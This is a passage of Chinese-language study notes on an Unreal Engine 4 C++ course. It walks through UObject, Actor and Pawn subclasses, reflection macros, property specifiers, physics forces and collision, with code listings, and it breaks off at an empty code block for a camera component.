        • Developer - 编辑器和引擎共同使用的文件。
        • Editor - 仅供编辑器使用的文件。
        • Programs - 引擎或编辑器使用的外部工具。
        • Runtime - 仅供引擎使用的文件。
      • Game - 游戏项目源码,建议按模块的方式进行组织。

    ​迁移项目最小的单元是 ConfigContentXXX.uproject

    203-Unreal 缓存数据解读

    png

    ​Epic 中修改保管库的缓存位置。

    png

    ​这个路径存放着着色器的缓存。

    209-C++ 与蓝图的关系与选择

    C++ 与蓝图

    • 两者关系
      • 蓝图建立在 C++ 代码之上
      • 蓝图与 C++ 可以很好地协作
    • 理论平衡
      • C++ 由游戏逻辑程序员使用
        • 完成虚幻尚未封装的功能
        • 完成根据项目需求需要自定义的功能
      • 蓝图由游戏设计人员使用
        • 设计其他游戏资源
        • 功能测试时使用
        • 项目快速迭代时使用
        • 调用编写好的 C++ 代码

    什么是蓝图可视化脚本

    • 蓝图可视化脚本简称“蓝图”、“蓝图脚本”
    • 蓝图是一种可视化编程
      • 实际上,你使用蓝图的时候就是在编程
      • 蓝图是一种需要编译的面向对象的可视化编程语言
    • 蓝图完全集成在虚幻 4 中
    • 通过节点与连线工作

    什么是蓝图系统

    • 蓝图系统俗称“蓝图”、“蓝图类”
    • 将蓝图类想象成游戏内容的容器
      • 其可以包含组件
      • 其可以包含脚本
      • 其可以仅仅包含数据

    301-C++ 基础回顾与虚幻 C++ 类的继承结构

    虚幻引擎 C++ 类层级结构 (Hierarchy)

    • Object

      • 存放数据

      • 不能被放置到场景 (Level) 中

    • Actor

      • 能放置在场景 (Level) 中
      • 可以有视觉表现/可以被看到
    • Pawn

      • 可以被控制器 (Controller) 持有 (Possess)
    • Character

      • 有角色移动组件 (CharacterMovementComponent)
      • 具有适合角色的封装好的一系列功能

    一个 Object 不是 (Is NOT a) Actor

    一个 Object 不是一个 (Is NOT a) Pawn

    一个 Actor 是一个 (ls a) Object

    一个 Actor 不是一个 (Is NOT a) Pawn

    一个 Pawn 是 (ls a) Actor

    一个 Pawn 是 (ls a) Object

    png

    PackageWorldLevelActor 之间的关系。

    302-使用宏参与虚幻的反射与垃圾回收系统

    ​UE4 的反射系统允许在运行时获取类的信息、动态创建对象、调用函数等操作,而无需提前知道类的具体类型。通过反射系统,可以实现诸如蓝图编辑、插件系统、序列化和反序列化等功能。在 UE4 中,反射系统主要基于宏(macros)和元数据(metadata)来实现,开发者可以利用它来实现更灵活的代码设计和功能扩展。(在蓝图脚本中调用 C++ 的内容)

    ​UE4 的垃圾回收系统负责管理动态分配的内存,在运行时自动释放不再需要的内存空间,防止内存泄漏和提高性能。UE4 使用基于引用计数(reference counting)和标记-清除(mark and sweep)算法的混合方式来进行垃圾回收,确保及时释放不再使用的对象,并最大程度地减少性能损耗。

    png

    ​在定义类、变量、函数前分别加上 UCLASS()UPROPERTY()UFUNCTION() 这样的宏,就可以参与反射与垃圾回收系统,

    ​引用头文件时,#include "MyActor.generated.h" 务必放在所有引用的头文件的下方。

    303-创建自己的第一个 UObject 子类

    ​新建一个 C++ 项目。

    png

    ​项目中确保打开了 Show C++ Classes

    png

    ​所有 C++ 类都会被存放到 C++ Classes/项目名称 中。

    png

    ​在这个目录下创建一个 C++ class,打开 Show All Classes,创建一个 Object 类。

    png

    ​名字取为 MyObject,则会生成 MyObject.cppMyObject.h 两个文件。

    .cpp 文件是写逻辑用的,.h 文件是写声明用的。

    ​修改 MyObject.h 文件,然后保存:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    // Fill out your copyright notice in the Description page of Project Settings.

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()
    };

    ​通过在类声明前添加 UCLASS(Blueprintable) 宏,可以让该类在 UE4 的蓝图编辑器中可见,允许开发者使用蓝图来创建该类的实例、设置属性和调用函数(在蓝图脚本中调用 C++ 的内容)。

    png

    ​可以用 VS 的生成进行编译(有可能 UE4 没反应过来,但可以方便地显示中文的报错信息)。

    png

    ​也可以用 UE4 的 Compile 按钮编译。

    png

    ​此时所创建的类就可以 Create Blueprint class based on MyObject

    304-加快 Unreal 编译速度

    ​UE4.22 中,每次编译都会重新生成反射代码,影响编译速度(不知道 4.27 还有没有……)。

    ​课程中提到的解决方案是,安装路径下找到 Win64/UnrealHeaderTool.target,往其中的第二行加一个空格……真玄学。

    png

    305-创建 UObject 的蓝图类与基础宏参数介绍

    png

    ​对于之前所创建的 MyObject 类,选择 Create Blueprint class based on MyObject 以创建一个反射的蓝图,命名为 BP_MyObject

    ​编写 MyObject.h 的代码,给 MyObject 定义一个构造函数、float 类型变量 MyFloat,函数 MyFunction(),添加宏 UPROPERTY(BlueprintReadWrite) 使得变量和函数能在蓝图类中读写:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    // Fill out your copyright notice in the Description page of Project Settings.

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()

    public:

    UMyObject();

    UPROPERTY(BlueprintReadWrite)
    float MyFloat;

    UFUNCTION(BlueprintCallable)
    void MyFunction();
    };

    ​在 MyObject.cpp 里写实现(暂为空):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    #include "MyObject.h"

    UMyObject::UMyObject()
    {

    }

    void UMyObject::MyFunction()
    {

    }

    ​保存并编译。

    png

    ​此时在对应的蓝图中就可以创建相关的节点。

    png

    ​试一试!

    306-使用 UE_LOG 打印日志与在蓝图中实例化继承于 Object 的类

    ​修改 MyObject.h,宏中可以定义变量/函数属于哪个 Category

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()

    public:

    UMyObject();

    UPROPERTY(BlueprintReadWrite, Category = "My Variables")
    float MyFloat;

    UFUNCTION(BlueprintCallable, Category = "My Functions")
    void MyFunction();
    };

    MyObject.cpp 中写 MyFunction() 的实现,UE_LOG() 可以向控制台输出信息:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    #include "MyObject.h"

    UMyObject::UMyObject()
    {
    MyFloat = 0.0f;
    }

    void UMyObject::MyFunction()
    {
    UE_LOG(LogTemp, Log, TEXT("Hello World!"));
    UE_LOG(LogTemp, Warning, TEXT("Hello World!"));
    UE_LOG(LogTemp, Error, TEXT("Hello World!"));
    }

    png

    ​在关卡蓝图中,Construct Object from Class 可以将某个类实例化。

    png

    ​这么画关卡蓝图,实例化 BP_MyObject 类,调用其中的 MyFunction()

    png

    ​开跑!此时就会在 OutputLog 里输出相应信息。

    307-如何删除自定义的 C++ 类

    401-创建自己的 Actor 子类与学习类的命名规范

    png

    ​创建一个 Actor 的 C++ class。

    png

    ​路径保持默认(源教程在 Path 里添油加醋了个 /Actor 结果我这里编译出错,好像不太聪明的样子……算了我还是妥协好了,后来又想了想可能要改一下 #include "MyActor.h" 的位置),之后创建好了 MyActor.hMyActor.cpp

    ​看一下 MyActor.cpp,感觉很像 Unity 里的 Start()Update()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }
    • 派生自 Actor 的类带有 A 前缀,如 AController
    • 派生自 Object 的类带有 U 前缀,如 UComponent
    • Enums 的前缀是 E,如 EFortificationType
    • Interface 的前缀通常是 I,如 lAbilitySystemInterface
    • Template 的前缀是 T,如 TArray
    • 派生自 SWidget 的类 (Slate Ul) 带有前缀 S,如 SButton
    • 其他类的前缀为字母 F,如 FVector

    ​看一看 MyActor.h 里的内容,虽然 UCLASS() 没有 Blueprintable,但是也可以执行 Create Blueprint class based on MyObject,这是因为所继承的类 AActor 自带 Blueprintable

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    402-组件简介与使用蓝图类扩展代码的优点

    ​略。这个蓝图跟 Unity 里的 prefab 蛮像的。

    403-在 C++ 中创建静态网格组件

    ​编辑 MyActor.h 里的内容,声明一个变量 UStaticMeshComponent* MyStaticMesh

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​编辑 MyActor.cpp 里的内容,在构造函数里设置 MyStaticMesh 里的值:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​如此做,对应的蓝图里就会显示构造函数创建的 MyStaticMesh

    png

    ​也可以不用蓝图直接将定义的 C++ class 拖到关卡中。

    404-导入模型与布置场景

    ​略。

    405-使用 SetActorLoction 控制位置与宏参数 EditInstanceOnly 介绍

    修改 MyActor.h 的内容,添加一个 FVector 类型的变量 InitLocation,上面添加修饰宏 UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector"),让这个值可以在实例中编辑:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容,在 BeginPlay() 中将 Actor 的坐标设为 InitLocation 的值。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​在蓝图实例中多了个设置 InitLocation 的地方,运行关卡会发现蓝图实例被正确地移动到了 InitLocation 的位置。

    406-VisibleInstanceOnly 与 EditDefaultsOnly

    ​修改 MyActor.h 里的内容,引入了两个新的宏参数:

    • VisibleInstanceOnly 只在实例中可见,不可编辑。
    • EditDefaultsOnly 只可在模板中编辑。

    ​将 bool 变量命名前加上前缀 b,UE 会自动识别并把前缀去除。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​开跑!可以看到宏变量 VisibleAnywhereEditInstanceOnlyVisibleInstanceOnlyEditDefaultsOnly 之间的区别。

    407-VisibleDefaultsOnly 与 EditAnywhere

    ​修改 MyActor.h 的内容,引入了两个新的宏参数:

    • VisibleDefaultsOnly 只在模板中可见(没有地方可以编辑,一般没什么卵用)。
    • EditAnywhere 在模板类和实例类中均可编辑。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    UPROPERTY(VisibleDefaultsOnly, Category = "My Actor Properties | Vector")
    FVector WorldOrigin;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    FVector TickLoactionOffset;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    bool bShouldMove;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset);
    }
    }

    png

    ​开跑!此时实例会每帧沿方向 (0.1, 0.1, 0.1) 移动。

    408-在编辑器中限制输入值的范围与不要将组件指针设为 EditAnywhere

    不要将组件指针设为 EditAnywhere

    1
    2
    UPROPERTY(EditAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    不要这么做!生成的界面会十分复杂,不友好!


    ​修改 MyActor.hTickLoactionOffset 的宏,如此做将在面板中限制变量的取值范围:

    1
    2
    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector", meta = (ClampMin = -5.0f, ClampMax = 5.0f, UIMin = -5.0f, UIMax = 5.0f))
    FVector TickLoactionOffset;

    png

    409-简单碰撞与复杂碰撞

    ​教你认识 UE 里的碰撞,分为 简单碰撞复杂碰撞

    png

    410-模拟物理与重力

    png

    ​物体中若打开了 Physics 下的 Simulate Physics,则会开启物理。

    png

    ​给这个物体加一个简单的凸包碰撞。

    png

    ​开跑!按下 `` 键可以打开命令行,输出show Collision` 即可在视图中显示碰撞的具体位置。

    411-通过代码增加力与力矩

    ​修改 MyActor.h 里的内容,添加了变量力 FVector InitForce、力矩 FVector InitTorque 和 纯改变加速度(施加力的时候忽略质量)bAccelChange

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    UPROPERTY(VisibleDefaultsOnly, Category = "My Actor Properties | Vector")
    FVector WorldOrigin;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector", meta = (ClampMin = -5.0f, ClampMax = 5.0f, UIMin = -5.0f, UIMax = 5.0f))
    FVector TickLoactionOffset;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    bool bShouldMove;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    FVector InitForce;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    FVector InitTorque;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    bool bAccelChange;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    MyStaticMesh->AddForce(InitForce, "NAME_None", bAccelChange);
    MyStaticMesh->AddTorque(InitForce, "NAME_None", bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset);
    }
    }

    MyStaticMesh-> 默认不可用,需从官方文档查找 UStaticMeshComponent 的属性:UStaticMeshComponent | Unreal Engine 5.2 Documentation 得到需引入 #include "Components/StaticMeshComponent.h"

    png

    ​此时在实例类中便可设置给对象初始化的力和力矩。

    png

    412-使用 Sweep 在不开启模拟物理的情况下进行碰撞

    ​在没有 Simulate Physics 的情况下,默认的碰撞是不会有效的,但是可以打开 Sweep 在不开启模拟物理的情况下进行碰撞。

    png

    ​修改 MyActor.cppAddActorLocalOffset(TickLoactionOffset, true); 便可在不使用物理的情况下进行碰撞:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    //MyStaticMesh->AddForce(InitForce, "NAME_None", bAccelChange);
    //MyStaticMesh->AddTorque(InitForce, "NAME_None", bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset, true);
    }
    }

    413-碰撞通道与击中信息

    png

    Collision 可以设置哪些碰撞有效,必须两个碰撞均是 Block 才可以阻挡。


    ​修改 MyActor.cpp 里的内容,FHitResult HitResultAddActorLocalOffset(TickLoactionOffset, true, &HitResult); 可以获取碰撞信息:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    //MyStaticMesh->AddForce(InitForce, "NAME_None", bAccelChange);
    //MyStaticMesh->AddTorque(InitForce, "NAME_None", bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    FHitResult HitResult;

    AddActorLocalOffset(TickLoactionOffset, true, &HitResult);
    UE_LOG(LogTemp, Warning, TEXT("X: %f, Y: %f, Z: %f"), HitResult.Location.X, HitResult.Location.Y, HitResult.Location.Z);
    }
    }

    png

    ​开跑!Output Log 将输出碰撞信息。

    414-其他常用函数与可探索部分

    ​略。

    501-创建自己的 Pawn 类、自己的根组件并将静态网格组件附加到其上

    png

    ​创建一个 Pawn 类型的 C++ Class,获得 MyPawn.hMyPawn.cpp

    ​编辑 MyPawn.h,定义变量 class UStaticMeshComponent* MyStaticMesh;,这个 class 可加可不加:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    ​编辑 MyPawn.cpp,设置 RootComponent 的值(模板自带),设置 MyStaticMesh 的值并将其设为 RootComponent 的子节点:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);
    }

    ​编译。Create Blueprint class based on MyPawn

    png

    ​开跑!

    png

    502-为自己的 Pawn 设置相机组件

    ​修改 MyPawn.h,定义一个新的变量 class UCameraComponent* MyCamera;

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    };

    ​修改 MyPawn.cpp,设置好 MyCamera 的属性:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
